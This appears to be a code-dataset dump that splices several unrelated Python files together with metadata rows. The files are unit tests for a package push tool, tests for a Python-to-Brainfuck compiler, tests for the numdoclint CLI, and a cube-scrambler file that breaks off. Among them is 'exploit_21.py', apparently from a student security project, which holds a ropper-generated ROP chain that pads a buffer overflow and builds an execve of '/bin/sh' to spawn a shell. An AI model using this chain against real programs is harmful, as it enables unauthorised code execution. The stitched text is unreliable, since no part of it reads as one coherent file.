lm_session.descriptor_driver.update_descriptor.assert_called_once_with('assembly::sub_basic-contains_basic::1.0', 'name: assembly::sub_basic-contains_basic::1.0\ndescription: descriptor\n')
def test_push_creates_behaviour_configuration(self):
pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_assembly_configuration.assert_called_once_with({
"name": "simple",
"projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
"description": "a simple assembly config",
"properties": {
"a": "123"
},
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z",
"descriptorName": "assembly::sub_with_behaviour-contains_with_behaviour::1.0"
})
def test_push_updates_behaviour_configuration_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'simple'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_assembly_configuration.assert_not_called()
lm_session.behaviour_driver.update_assembly_configuration.assert_called_once_with({
"id": "existing",
"name": "simple",
"projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
"description": "a simple assembly config",
"properties": {
"a": "123"
},
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z",
"descriptorName": "assembly::sub_with_behaviour-contains_with_behaviour::1.0"
})
def test_push_creates_behaviour_scenarios(self):
pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'simple'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_scenario.assert_has_calls([
call({
"name": "runtime",
"projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
"description": "a runtime scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "ExistingProvidedAssembly",
"provided": True
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
}),
call({
"name": "test",
"projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
"description": "a test scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "simple",
"assemblyConfigurationId": "existing",
"initialState": "Active",
"uninstallOnExit": True,
"provided": False
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
})
])
def test_push_updates_behaviour_scenarios_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_assembly_contains_assembly_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'simple'})
lm_sim.add_scenario({'id': 'existingRuntime', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'runtime'})
lm_sim.add_scenario({'id': 'existingTest', 'projectId': 'assembly::sub_with_behaviour-contains_with_behaviour::1.0', 'name': 'test'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_scenario.assert_not_called()
lm_session.behaviour_driver.update_scenario.assert_has_calls([
call({
"id": "existingRuntime",
"name": "runtime",
"projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
"description": "a runtime scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "ExistingProvidedAssembly",
"provided": True
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
}),
call({
"id": "existingTest",
"name": "test",
"projectId": "assembly::sub_with_behaviour-contains_with_behaviour::1.0",
"description": "a test scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "simple",
"assemblyConfigurationId": "existing",
"initialState": "Active",
"uninstallOnExit": True,
"provided": False
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
})
])
class TestPushOldStyle(ProjectSimTestCase):
def test_push(self):
pkg_sim = self.simlab.simulate_pkg_assembly_old_style()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
arm_sim = self.simlab.simulate_arm()
arm_session = arm_sim.as_mocked_session()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_rm({'name': arm_session.env.name, 'url': arm_session.env.address})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session, arm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
csar_a_path = os.path.join(result.tree.root_path, PROJECT_CONTAINS_DIR, 'vnfcA', 'vnfcA.csar')
csar_b_path = os.path.join(result.tree.root_path, PROJECT_CONTAINS_DIR, 'vnfcB', 'vnfcB.csar')
arm_session.arm_driver.onboard_type.assert_has_calls([call('vnfcA', '1.0', csar_a_path), call('vnfcB', '2.0', csar_b_path)])
| 47.32844
| 197
| 0.562922
| 2,424
| 25,794
| 5.675743
| 0.057343
| 0.061419
| 0.038668
| 0.04143
| 0.94316
| 0.934002
| 0.919828
| 0.91554
| 0.90093
| 0.889519
| 0
| 0.034311
| 0.3243
| 25,794
| 544
| 198
| 47.415441
| 0.755063
| 0
| 0
| 0.756705
| 0
| 0
| 0.253276
| 0.136427
| 0
| 0
| 0
| 0
| 0.084291
| 1
| 0.030651
| false
| 0
| 0.015326
| 0
| 0.051724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adc7c7897eb6b1071394052c241a9705154b6830
| 2,293
|
py
|
Python
|
2. ASLR & PIE/exploit_21.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | null | null | null |
2. ASLR & PIE/exploit_21.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | null | null | null |
2. ASLR & PIE/exploit_21.py
|
MBWlodarczyk/bso_project
|
a4620fb18d7f789d917627232dc85ef9bcad7e3d
|
[
"MIT"
] | 1
|
2021-05-27T22:04:35.000Z
|
2021-05-27T22:04:35.000Z
|
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # c7fd8b0f7cb07554b7f8e67b396605fa8c500b11beb0fb80ec3e797bfd8338ec
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = 'a'*28
rop += rebase_0(0x00001743) # 0x08049743: pop edi; ret;
rop += '//bi'
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009b060)
rop += rebase_0(0x000462fd) # 0x0808e2fd: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x00001743) # 0x08049743: pop edi; ret;
rop += 'n/sh'
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009b064)
rop += rebase_0(0x000462fd) # 0x0808e2fd: mov dword ptr [ebx], edi; pop ebx; pop esi; pop edi; ret;
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x00007920) # 0x0804f920: xor eax, eax; ret;
rop += rebase_0(0x0001d55e) # 0x0806555e: pop edx; pop ebx; pop esi; ret;
rop += rebase_0(0x0009b068)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x00016f1a) # 0x0805ef1a: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
rop += rebase_0(0x0009b060)
rop += rebase_0(0x0001b741) # 0x08063741: pop ecx; add al, 0xf6; ret;
rop += rebase_0(0x0009b068)
rop += rebase_0(0x0004fa45) # 0x08097a45: pop edx; xor eax, eax; pop edi; ret;
rop += rebase_0(0x0009b068)
rop += p(0xdeadbeef)
rop += rebase_0(0x00007920) # 0x0804f920: xor eax, eax; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360) # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00030e70) # 0x08078e70: int 0x80; ret;
print rop
| 41.690909
| 100
| 0.696904
| 340
| 2,293
| 4.594118
| 0.211765
| 0.143406
| 0.198464
| 0.166453
| 0.739437
| 0.735595
| 0.71895
| 0.71895
| 0.71895
| 0.617798
| 0
| 0.296527
| 0.158744
| 2,293
| 54
| 101
| 42.462963
| 0.513219
| 0.437418
| 0
| 0.708333
| 1
| 0
| 0.007937
| 0
| 0
| 0
| 0.325397
| 0
| 0
| 0
| null | null | 0
| 0.020833
| null | null | 0.020833
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
bc01b710ff377d095ac4e07c8d36db3d4bbe65da
| 3,347
|
py
|
Python
|
t/py2b/operators.py
|
vegitron/python2brainfuck
|
5d6732db19a6f16a21d375b50d39bf80858c3f84
|
[
"Apache-2.0"
] | null | null | null |
t/py2b/operators.py
|
vegitron/python2brainfuck
|
5d6732db19a6f16a21d375b50d39bf80858c3f84
|
[
"Apache-2.0"
] | null | null | null |
t/py2b/operators.py
|
vegitron/python2brainfuck
|
5d6732db19a6f16a21d375b50d39bf80858c3f84
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from p2bf.builder import BFBuild
from p2bf.emitter import Emitter
import StringIO
from util.run_bf import run
class TestOperators(unittest.TestCase):
def test_equality_true_false(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """foo = True == True\nprint foo"""
builder = BFBuild(python, emit=emitter).emit_bf()
memory_space = []
run(emit_output.getvalue(), stdout=run_output, memory=memory_space)
self.assertEquals(1, ord(run_output.getvalue()[0]))
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """foo = True == False\nprint foo"""
builder = BFBuild(python, emit=emitter).emit_bf()
memory_space = []
run(emit_output.getvalue(), stdout=run_output, memory=memory_space)
self.assertEquals(0, ord(run_output.getvalue()[0]))
def test_equality_statics(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """foo = "a" == "a"\nprint foo"""
builder = BFBuild(python, emit=emitter).emit_bf()
memory_space = []
run(emit_output.getvalue(), stdout=run_output, memory=memory_space)
self.assertEquals(1, ord(run_output.getvalue()[0]))
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """foo = "a" == "b"\nprint foo"""
builder = BFBuild(python, emit=emitter).emit_bf()
memory_space = []
run(emit_output.getvalue(), stdout=run_output, memory=memory_space)
self.assertEquals(0, ord(run_output.getvalue()[0]))
def test_equality_in_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if True == True:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEquals("OK\n", run_output.getvalue())
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if False == True:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEquals("", run_output.getvalue())
def test_difference_in_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if True != False:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEquals("OK\n", run_output.getvalue())
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if True != True:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEquals("", run_output.getvalue())
| 41.8375
| 75
| 0.640275
| 391
| 3,347
| 5.286445
| 0.107417
| 0.11611
| 0.170295
| 0.100629
| 0.898887
| 0.898887
| 0.898887
| 0.898887
| 0.898887
| 0.898887
| 0
| 0.00387
| 0.227965
| 3,347
| 79
| 76
| 42.367089
| 0.796053
| 0
| 0
| 0.742857
| 0
| 0
| 0.076188
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 1
| 0.057143
| false
| 0
| 0.071429
| 0
| 0.142857
| 0.114286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb21ae06fb8342ff2f0507e78727b6accea0d856
| 14,378
|
py
|
Python
|
tests/test_cli.py
|
peterprescott/numdoclint
|
ab9aad01b50c5060373d28bbf5930d2509f2228a
|
[
"MIT"
] | 4
|
2020-01-01T16:10:44.000Z
|
2022-01-06T11:30:12.000Z
|
tests/test_cli.py
|
peterprescott/numdoclint
|
ab9aad01b50c5060373d28bbf5930d2509f2228a
|
[
"MIT"
] | 28
|
2019-06-25T12:05:04.000Z
|
2022-03-25T16:37:05.000Z
|
tests/test_cli.py
|
peterprescott/numdoclint
|
ab9aad01b50c5060373d28bbf5930d2509f2228a
|
[
"MIT"
] | 1
|
2022-03-16T13:09:03.000Z
|
2022-03-16T13:09:03.000Z
|
import os
import shutil
from typing import List
import pytest
import six
from voluptuous import Any, Schema
from numdoclint import cli, jupyter_notebook, py_module
TMP_TEST_MODULE_DIR: str = 'tests/tmp_test/'
TMP_TEST_MODULE_PATH_1: str = os.path.join(
TMP_TEST_MODULE_DIR,
'tmp_test_1.py')
TMP_TEST_MODULE_PATH_2: str = os.path.join(
TMP_TEST_MODULE_DIR,
'tmp_test_2.py')
def setup() -> None:
"""Function to be executed at the start of the test.
"""
shutil.rmtree(TMP_TEST_MODULE_DIR, ignore_errors=True)
os.makedirs(TMP_TEST_MODULE_DIR)
init_file_path: str = os.path.join(TMP_TEST_MODULE_DIR, '__init__.py')
with open(init_file_path, 'w') as f:
f.write('\n')
def teardown() -> None:
"""Function to be executed at the end of the test.
"""
shutil.rmtree(TMP_TEST_MODULE_DIR, ignore_errors=True)
def test__get_list_of_str_from_csv() -> None:
result_list: List[str] = cli._get_list_of_str_from_csv(csv='')
assert result_list == []
result_list = cli._get_list_of_str_from_csv(csv='apple,orange')
assert result_list == ['apple', 'orange']
def test__get_list_of_int_from_csv() -> None:
result_list: List[int] = cli._get_list_of_int_from_csv(csv='')
assert result_list == []
result_list = cli._get_list_of_int_from_csv(csv='1,2,3')
assert result_list == [1, 2, 3]
def _assert_default_value_check_info_id_is_in(info_list: List[dict]) -> None:
"""
Check that the check result of the default value
is included in the list.
Parameters
----------
info_list : list of dict
List of check results.
Raises
------
AssertionError
If not included in the list.
"""
default_val_info_exists: bool = False
for info_dict in info_list:
if (info_dict[py_module.INFO_KEY_INFO_ID]
== py_module.INFO_ID_LACKED_DOC_DEFAULT_VALUE):
default_val_info_exists = True
break
assert default_val_info_exists
def _assert_default_value_check_info_id_is_not_in(
info_list: List[dict]) -> None:
"""
Check that the check result of the default value is not
included in the list.
Parameters
----------
info_list : list of dicts
List of check results.
Raises
------
AssertionError
If included in the list.
"""
info_id_list: List[int] = [
info_dict[py_module.INFO_KEY_INFO_ID] for info_dict in info_list]
for info_id in info_id_list:
assert info_id != py_module.INFO_ID_LACKED_DOC_DEFAULT_VALUE
def test__validate_args() -> None:
with pytest.raises(Exception): # type: ignore
cli._validate_args(
path=None, # type: ignore
ignore_info_id_list=[],
check_recursively=False)
with pytest.raises(Exception): # type: ignore
cli._validate_args(
path='sample/path.py',
ignore_info_id_list=[-1],
check_recursively=False)
with pytest.raises(Exception): # type: ignore
cli._validate_args(
path='sample/path.py',
ignore_info_id_list=[],
check_recursively=True)
cli._validate_args(
path='sample/path.py',
ignore_info_id_list=[],
check_recursively=False)
def test__exec_numdoclint() -> None:
module_str_1: str = """
def sample_func_1(price):
pass
"""
with open(TMP_TEST_MODULE_PATH_1, 'w') as f:
f.write(module_str_1)
module_str_2: str = '''
@Appender
def sample_func_2(price=100):
"""
Sample function.
Parameters
----------
price : bool
Sample price
"""
pass
'''
with open(TMP_TEST_MODULE_PATH_2, 'w') as f:
f.write(module_str_2)
info_list: List[dict] = cli._exec_numdoclint(
path=TMP_TEST_MODULE_PATH_1,
check_recursively=False,
is_jupyter=False,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
schema: Schema = Schema(
schema={
py_module.INFO_KEY_MODULE_PATH: TMP_TEST_MODULE_PATH_1,
py_module.INFO_KEY_FUNC_NAME: 'sample_func_1',
py_module.INFO_KEY_INFO_ID: int,
py_module.INFO_KEY_INFO: Any(*six.string_types),
},
required=True)
for info_dict in info_list:
schema(info_dict)
info_id_list: List[int] = [
info_dict[py_module.INFO_KEY_INFO_ID] for info_dict in info_list]
info_list = cli._exec_numdoclint(
path=TMP_TEST_MODULE_PATH_1,
check_recursively=False,
is_jupyter=False,
ignore_func_name_prefix_list=['sample_'],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list == []
info_list = cli._exec_numdoclint(
path=TMP_TEST_MODULE_PATH_1,
check_recursively=False,
is_jupyter=False,
ignore_func_name_prefix_list=[],
ignore_info_id_list=info_id_list,
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list == []
info_list = cli._exec_numdoclint(
path=TMP_TEST_MODULE_PATH_2,
check_recursively=False,
is_jupyter=False,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list
info_list = cli._exec_numdoclint(
path=TMP_TEST_MODULE_PATH_2,
check_recursively=False,
is_jupyter=False,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=False,
skip_decorator_name_list=[])
assert info_list == []
info_list = cli._exec_numdoclint(
path=TMP_TEST_MODULE_PATH_2,
check_recursively=False,
is_jupyter=False,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=['Appender'])
assert info_list == []
schema = Schema(
schema={
py_module.INFO_KEY_MODULE_PATH: Any(*six.string_types),
py_module.INFO_KEY_FUNC_NAME: Any(*six.string_types),
py_module.INFO_KEY_INFO_ID: int,
py_module.INFO_KEY_INFO: Any(*six.string_types),
},
required=True)
info_list = cli._exec_numdoclint(
path=TMP_TEST_MODULE_DIR,
check_recursively=True,
is_jupyter=False,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list
for info_dict in info_list:
schema(info_dict)
module_path_list: List[str] = [
info_dict[py_module.INFO_KEY_MODULE_PATH] for info_dict in info_list]
module_path_1_exists: bool = False
module_path_2_exists: bool = False
for module_path in module_path_list:
if TMP_TEST_MODULE_PATH_1 in module_path:
module_path_1_exists = True
continue
if TMP_TEST_MODULE_PATH_2 in module_path:
module_path_2_exists = True
continue
assert module_path_1_exists
assert module_path_2_exists
info_id_list = [
info_dict[py_module.INFO_KEY_INFO_ID] for info_dict in info_list]
info_list = cli._exec_numdoclint(
path=TMP_TEST_MODULE_DIR,
check_recursively=True,
is_jupyter=False,
ignore_func_name_prefix_list=['test_', 'sample_'],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list == []
info_list = cli._exec_numdoclint(
path=TMP_TEST_MODULE_DIR,
check_recursively=True,
is_jupyter=False,
ignore_func_name_prefix_list=[],
ignore_info_id_list=info_id_list,
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list == []
info_list = cli._exec_numdoclint(
path=TMP_TEST_MODULE_DIR,
check_recursively=True,
is_jupyter=False,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=False,
skip_decorator_name_list=[])
info_id_list = [
info_dict[py_module.INFO_KEY_INFO_ID] for info_dict in info_list]
_assert_default_value_check_info_id_is_not_in(info_list=info_list)
schema = Schema(
schema={
jupyter_notebook.INFO_KEY_NOTEBOOK_PATH:
'./tests/jupyter/test_jupyter_notebook_py3.ipynb',
jupyter_notebook.INFO_KEY_CODE_CELL_INDEX: int,
jupyter_notebook.INFO_KEY_FUNC_NAME: Any(*six.string_types),
jupyter_notebook.INFO_KEY_INFO_ID: int,
jupyter_notebook.INFO_KEY_INFO: Any(*six.string_types),
},
required=True)
info_list = cli._exec_numdoclint(
path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
check_recursively=False,
is_jupyter=True,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list
for info_dict in info_list:
schema(info_dict)
info_id_list = [
info_dict[jupyter_notebook.INFO_KEY_INFO_ID]
for info_dict in info_list]
info_list = cli._exec_numdoclint(
path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
check_recursively=False,
is_jupyter=True,
ignore_func_name_prefix_list=['sample_', 'test_'],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list == []
info_list = cli._exec_numdoclint(
path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
check_recursively=False,
is_jupyter=True,
ignore_func_name_prefix_list=[],
ignore_info_id_list=info_id_list,
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list == []
info_list = cli._exec_numdoclint(
path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
check_recursively=False,
is_jupyter=True,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
_assert_default_value_check_info_id_is_in(info_list=info_list)
info_list = cli._exec_numdoclint(
path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
check_recursively=False,
is_jupyter=True,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=False,
skip_decorator_name_list=[])
for info_dict in info_list:
assert (
info_dict[jupyter_notebook.INFO_KEY_INFO_ID]
!= py_module.INFO_ID_LACKED_DOC_DEFAULT_VALUE)
info_list = cli._exec_numdoclint(
path='./tests/jupyter/',
check_recursively=True,
is_jupyter=True,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
schema = Schema(
schema={
jupyter_notebook.INFO_KEY_NOTEBOOK_PATH: Any(*six.string_types),
jupyter_notebook.INFO_KEY_CODE_CELL_INDEX: int,
jupyter_notebook.INFO_KEY_FUNC_NAME: Any(*six.string_types),
jupyter_notebook.INFO_KEY_INFO_ID: int,
jupyter_notebook.INFO_KEY_INFO: Any(*six.string_types),
},
required=True)
assert info_list
for info_dict in info_list:
schema(info_dict)
unique_notebook_path_list = [
info_dict[jupyter_notebook.INFO_KEY_NOTEBOOK_PATH]
for info_dict in info_list]
unique_notebook_path_list = list(set(unique_notebook_path_list))
assert len(unique_notebook_path_list) > 1
_assert_default_value_check_info_id_is_in(info_list=info_list)
info_id_list = [
info_dict[jupyter_notebook.INFO_KEY_INFO_ID]
for info_dict in info_list]
info_list = cli._exec_numdoclint(
path='./tests/jupyter/',
check_recursively=True,
is_jupyter=True,
ignore_func_name_prefix_list=['test_', 'sample_'],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list == []
info_list = cli._exec_numdoclint(
path='./tests/jupyter/',
check_recursively=True,
is_jupyter=True,
ignore_func_name_prefix_list=[],
ignore_info_id_list=info_id_list,
enable_default_or_optional_doc_check=True,
skip_decorator_name_list=[])
assert info_list == []
info_list = cli._exec_numdoclint(
path='./tests/jupyter/',
check_recursively=True,
is_jupyter=True,
ignore_func_name_prefix_list=[],
ignore_info_id_list=[],
enable_default_or_optional_doc_check=False,
skip_decorator_name_list=[])
_assert_default_value_check_info_id_is_not_in(info_list=info_list)
def test_main() -> None:
module_str_1: str = """
def sample_func_1(price):
pass
"""
with open(TMP_TEST_MODULE_PATH_1, 'w') as f:
f.write(module_str_1)
class Args:
path: str = TMP_TEST_MODULE_PATH_1
check_recursively: bool = False
is_jupyter: bool = False
ignore_func_name_prefix_list: List[str] = []
ignore_info_id_list: List[int] = []
enable_default_or_optional_doc_check: bool = True
skip_decorator_name_list: List[str] = []
args: Args = Args()
info_list: List[dict] = cli.main(
args=args, # type: ignore
return_list=True)
assert info_list
schema: Schema = Schema(
schema={
py_module.INFO_KEY_MODULE_PATH: TMP_TEST_MODULE_PATH_1,
py_module.INFO_KEY_FUNC_NAME: 'sample_func_1',
py_module.INFO_KEY_INFO_ID: int,
py_module.INFO_KEY_INFO: Any(*six.string_types),
},
required=True)
for info_dict in info_list:
schema(info_dict)
| 33.751174
| 77
| 0.670538
| 1,936
| 14,378
| 4.472107
| 0.0625
| 0.057288
| 0.040425
| 0.044352
| 0.883114
| 0.852044
| 0.826403
| 0.789097
| 0.757103
| 0.742666
| 0
| 0.004765
| 0.240924
| 14,378
| 425
| 78
| 33.830588
| 0.788529
| 0.041591
| 0
| 0.733516
| 0
| 0
| 0.057894
| 0.025543
| 0
| 0
| 0
| 0
| 0.085165
| 1
| 0.024725
| false
| 0.008242
| 0.019231
| 0
| 0.065934
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb7a9de0b9b2a2419581255afd1cac913ec3dbbd
| 34,478
|
py
|
Python
|
pycubescrambler/nxn.py
|
cuberxmidnight/pycubescrambler
|
603f335a5ef9b50b3eb2847b5fe7f6f6f63b2f7a
|
[
"MIT"
] | null | null | null |
pycubescrambler/nxn.py
|
cuberxmidnight/pycubescrambler
|
603f335a5ef9b50b3eb2847b5fe7f6f6f63b2f7a
|
[
"MIT"
] | null | null | null |
pycubescrambler/nxn.py
|
cuberxmidnight/pycubescrambler
|
603f335a5ef9b50b3eb2847b5fe7f6f6f63b2f7a
|
[
"MIT"
] | null | null | null |
import random
def get_fmc():
def main_scram():
moves = ["F","B","R","L","U","D"]
